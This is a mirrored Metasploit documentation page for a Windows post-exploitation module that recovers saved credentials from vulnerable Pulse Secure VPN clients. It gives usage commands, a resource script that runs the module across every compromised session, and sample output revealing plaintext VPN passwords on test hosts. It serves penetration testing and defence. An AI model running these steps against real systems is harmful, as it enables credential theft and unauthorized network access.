CoCalc -- pulse

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/post/windows/gather/credentials/pulse_secure.md
Views: ¹⁹⁰⁴

Vulnerable Application

Pulse Secure VPN Client for versions 9.1 prior to 9.1R4 and 9.0 prior to 9.0R5.

An end-to-end setup with working Juniper Pulse Secure VPN server, Pulse Secure client on Microsoft Windows, and valid credentials are required for Pulse Secure client to save credentials locally and therefore test this.

Verification Steps

Get a Meterpreter shell on a Windows machine that has Pulse Secure client installed.
Load the module: use post/windows/gather/credentials/pulse_secure
Set the correct session on the module: set SESSION *session id*
Run the module with run and enjoy the loot.

Scenarios

The command for all scenarios is the same:

msf > use post/windows/gather/credentials/pulse_secure
msf > set SESSION 1
msf > run

If you wish to run the post module against all sessions from framework, here is how:

Create the following resource script:

framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/pulse_secure")
  run_single("set SESSION #{sid}")
  run_single("run")
end

At the msf prompt, execute the above resource script: msf > resource path-to-resource-script

Pulse Secure 9.0.4 on Microsoft Windows 10 Enterprise 19042

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.0.4.1731.
[+] This version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*]      Username: 
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Pulse Secure 9.0.5 on Microsoft Windows 10 Enterprise 19042

With leftovers from previously installed version (9.0.4):

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[+] Account found
[*]      Username:
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Without any leftovers from previously installed versions:

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[*] Post module execution completed

Pulse Secure 9.0.5 on Microsoft Windows 10 Enterprise 19042 (Elevated)

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.0.5.1907.
[+] You're executing from a privileged process so this version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*]      Username: john.doe@contoso.local
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Pulse Secure 9.1.3 on Microsoft Windows 10 Enterprise 19042

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.1.3.1313.
[+] This version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*]      Username:
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Pulse Secure 9.1.4 on Microsoft Windows 10 Enterprise 19042

With leftovers from previously installed version (9.1.3):

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[+] Account found
[*]      Username: 
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Without leftovers:

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[!] You're executing from an unprivileged process so this version is considered safe.
[!] However, there might be leftovers from previous versions in the registry.
[!] We recommend running this script in elevated mode to obtain credentials saved by recent versions.
[*] Running credentials acquisition.
[*] Post module execution completed

Pulse Secure 9.1.4 on Microsoft Windows 10 Enterprise 19042 (Elevated)

msf6 post(windows/gather/credentials/pulse_secure) > run

[*] Target is running Pulse Secure Connect build 9.1.4.1955.
[+] You're executing from a privileged process so this version is considered vulnerable.
[*] Running credentials acquisition.
[+] Account found
[*]      Username: john.doe@contoso.local
[*]      Password: John2020!!
[*]      URI: https://vpn.contoso.local
[*]      Name: Contoso VPN
[*]      Source: user
[*] Post module execution completed

Host without Pulse Secure

msf6 post(windows/gather/credentials/pulse_secure) > run

[-] Pulse Secure Connect client is not installed on this system
[*] Post module execution completed